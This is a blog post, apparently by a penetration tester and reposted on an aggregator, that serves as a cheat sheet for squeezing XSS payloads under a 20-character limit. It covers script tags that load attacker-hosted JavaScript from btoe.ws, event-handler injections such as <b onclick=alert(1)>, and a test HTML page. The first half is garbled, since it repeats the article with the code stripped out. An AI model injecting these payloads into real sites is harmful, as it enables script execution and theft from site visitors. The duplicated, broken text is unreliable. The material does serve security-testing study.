XSS Shortening Cheatsheet
2012-04-23 20:27
330 查看
In the course of a recent assessment of a web application, I ran into an interesting problem. I found XSS on a page, but the field was limited (yes, on the server side) to 20 characters. Of course I could demonstrate the problem to the client by injecting
a simple
My go to line for testing XSS is always
only 9 million pages containing the string
This brings me to the problem. The above string is 30 characters long and I need to inject into a parameter that will only accept up to 20 characters. There are a few tricks for shortening your
If you don’t specify a scheme section of the URL (http/https/whatever), the browser uses the current scheme. E.g.
If you don’t specify the host section of the URL, the browser uses the current host. This is only really valuable if you can upload a malicious JavaScript file to the server you are trying to get XSS on. Eg.
If you are including a JavaScript file from another domain, there is no reason why its extension must be
If you are using IE you don’t need to close the
You don’t need quotes around your
In the best case (your victim is running IE and you can upload arbitrary files to the web root), it seems that all you would need is
malicious code on another domain. I own
Time to give up? I think not.
Another option is to forgo the
You can make up your own tags! E.g.
If you don’t close your tag, some events will be inherited by the rest of the page following your injected code. E.g.
You don’t need to wrap your code in quotes. Eg.
If the page already has some useful JavaScript (think JQuery) loaded, you can call their functions instead of your own. Eg. If they have a function defined as
While
on all browsers, though. E.g.
Putting these tricks together, our optimal solution (assuming they have a one letter function defined that does exactly what we want) gives us
This worked for me, but maybe 20 characters is too long for you. If you really have to be a minimalist, injecting the
This article is by no means intended to provide the answer, but rather to ask a question. I ask, or dare I say
challenge, you to find a better solution than what I have shown above. It is also worth noting that I tested most of this on recent versions of Firefox and Chrome, but no other browsers. I am using a Linux box and don’t have access to much else at
the moment. If you know that some of the above code does not work in other browsers, please comment bellow and I will make an edit, but please don’t tell me what does and does not work in lynx.
If you want to see some of these in action, copy the following into a file and open it in your your browser or go to
http://btoe.ws/shrtxss.html.
Edit: albinowax points out that onblur is shorter than onclickor onkeyup.
<!-- XSS Injected here -->
<x onclick=alert(1)>
<b onkeyup=alert(1)>
<x onclick=a()>
<b onkeyup=a()>
<body onload=a()>
<!-- End XSS Injection -->
<h1>XSS ROCKS</h1>
<p>click me</p>
<form>
<input value='try typing in here'>
</form>
</body>
</html>
PS: I did some Googling before writing this. Thanks to those at
sla.ckers.org and at
gnarlysec.
a simple
<b>hello</b>into their page, but it leaves much more of an impression of severity when you can at least make an alert box.
My go to line for testing XSS is always
<script>alert(123123)</script>. It looks somewhat arbitrary, but I use it specifically because
123123is easy to grep for and will rarely show up as a false positive (a quick Google search returns
only 9 million pages containing the string
123123). It is also nice because it doesn’t require apostrophes.
This brings me to the problem. The above string is 30 characters long and I need to inject into a parameter that will only accept up to 20 characters. There are a few tricks for shortening your
<script>tag, some more well known than others. Here are a few:
If you don’t specify a scheme section of the URL (http/https/whatever), the browser uses the current scheme. E.g.
<script src='//btoe.ws/xss.js'></script>
If you don’t specify the host section of the URL, the browser uses the current host. This is only really valuable if you can upload a malicious JavaScript file to the server you are trying to get XSS on. Eg.
<script src='evil.js'></script>
If you are including a JavaScript file from another domain, there is no reason why its extension must be
.js. Pro-tip: you could even have the malicious JavaScript file be set as the index on your server… Eg.
<script src='http://btoe.ws'>
If you are using IE you don’t need to close the
<script>tag (although I haven’t tested this in years and don’t have a Windows box handy). E.g.
<script src='http://btoe.ws/evil.js'>
You don’t need quotes around your
srcattribute. Eg.
<script src=http://btoe.ws/evil.js></script>
In the best case (your victim is running IE and you can upload arbitrary files to the web root), it seems that all you would need is
<script src=/>. That’s pretty impressive, weighing in at only 14 characters. Then again, when will you actually get to use that in the wild or on an assessment? More likely is that you will have to host your
malicious code on another domain. I own
btoe.ws, which is short, but not quite as handy as some of the five letter domain names. If you have one of those, the best you could do is
<script src=ab.cd>. This is 18 characters and works in IE, but let’s assume that you want to be cross-platform and go with the 27 character option of
<script src=ab.cd></script>. Thats still pretty short, but we are back over my 20 character limit.
Time to give up? I think not.
Another option is to forgo the
<script>tag entirely. After all, ‘script’ is such a long word… There are many one letter HTML tags that accept event handlers.
onclickand
onkeyupare even pretty short. Here are a couple more tricks:
You can make up your own tags! E.g.
<x onclick="alert(1)">foo</x>
If you don’t close your tag, some events will be inherited by the rest of the page following your injected code. E.g.
<x onclick='alert(1)'>.
You don’t need to wrap your code in quotes. Eg.
<b onclick=alert(1)>foo</b>
If the page already has some useful JavaScript (think JQuery) loaded, you can call their functions instead of your own. Eg. If they have a function defined as
function a(){alert(1)}you can simply do
<b onclick='a()'>foo</b>
While
onclickand
onkeyupare short when used with
<b>or a custom tag, they aren’t going to fire without user interaction. The
onloadevent of the
<body>tag on the other hand will. I think that having duplicate
<body>tags might not work
on all browsers, though. E.g.
<body onload='alert(1)'>
Putting these tricks together, our optimal solution (assuming they have a one letter function defined that does exactly what we want) gives us
<b onclick=a()>. Similar to the unrealistically good
<script>tag example from above, this comes in at 14 characters. A more realistic and useful line might be
<b onclick=alert(1)>. This comes it at exactly 20 characters, which is within my limit.
This worked for me, but maybe 20 characters is too long for you. If you really have to be a minimalist, injecting the
<b>tag into the page is the smallest thing I can think of that will affect the page without raising too many errors. Slightly more minimalistic than that would be to simply inject
<. This would likely break the page, but it would at least be noticable and would prove your point.
This article is by no means intended to provide the answer, but rather to ask a question. I ask, or dare I say
challenge, you to find a better solution than what I have shown above. It is also worth noting that I tested most of this on recent versions of Firefox and Chrome, but no other browsers. I am using a Linux box and don’t have access to much else at
the moment. If you know that some of the above code does not work in other browsers, please comment bellow and I will make an edit, but please don’t tell me what does and does not work in lynx.
If you want to see some of these in action, copy the following into a file and open it in your your browser or go to
http://btoe.ws/shrtxss.html.
Edit: albinowax points out that onblur is shorter than onclickor onkeyup.
<html> <head> <title>xss example</title> <script> //my awesome js function a(){alert(1)} </script> </head> <body>
<!-- XSS Injected here -->
<x onclick=alert(1)>
<b onkeyup=alert(1)>
<x onclick=a()>
<b onkeyup=a()>
<body onload=a()>
<!-- End XSS Injection -->
<h1>XSS ROCKS</h1>
<p>click me</p>
<form>
<input value='try typing in here'>
</form>
</body>
</html>
PS: I did some Googling before writing this. Thanks to those at
sla.ckers.org and at
gnarlysec.
相关文章推荐
- XSS Cheat Sheet
- DOM based XSS Prevention Cheat Sheet(DOM Based XSS防御检查单)
- XSS Filter Evasion Cheat Sheet
- 转:XSS (Cross Site Scripting) Prevention Cheat Sheet
- Share:《THE ULTIMATE XSS PROTECTION CHEATSHEET FOR DEVELOPERS》
- XSS (Cross Site Scripting) Prevention Cheat Sheet(XSS防护检查单)
- XSS Filter Evasion Cheat Sheet
- XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
- XSS Filter Evasion Cheat Sheet 中文版
- XSS Filter Evasion Cheat Sheet
- XSS Filter Evasion Cheat Sheet 中文版
- XSS (Cross Site Scripting) Prevention Cheat Sheet
- XSS Filter Evasion Cheat Sheet
- Git Cheat Sheet Chinese Awesome
- cheatsheet——mac 上的一款可以显示软件所有快捷键的小工具
- Microsoft AJAX Library Cheat Sheet(4):DomEvent类
- Microsoft AJAX Library Cheat Sheet (一)Array类型的扩展
- SQL Injection Cheat Sheet
- The Vim commands cheat sheet
- SQL Injection Cheat Sheet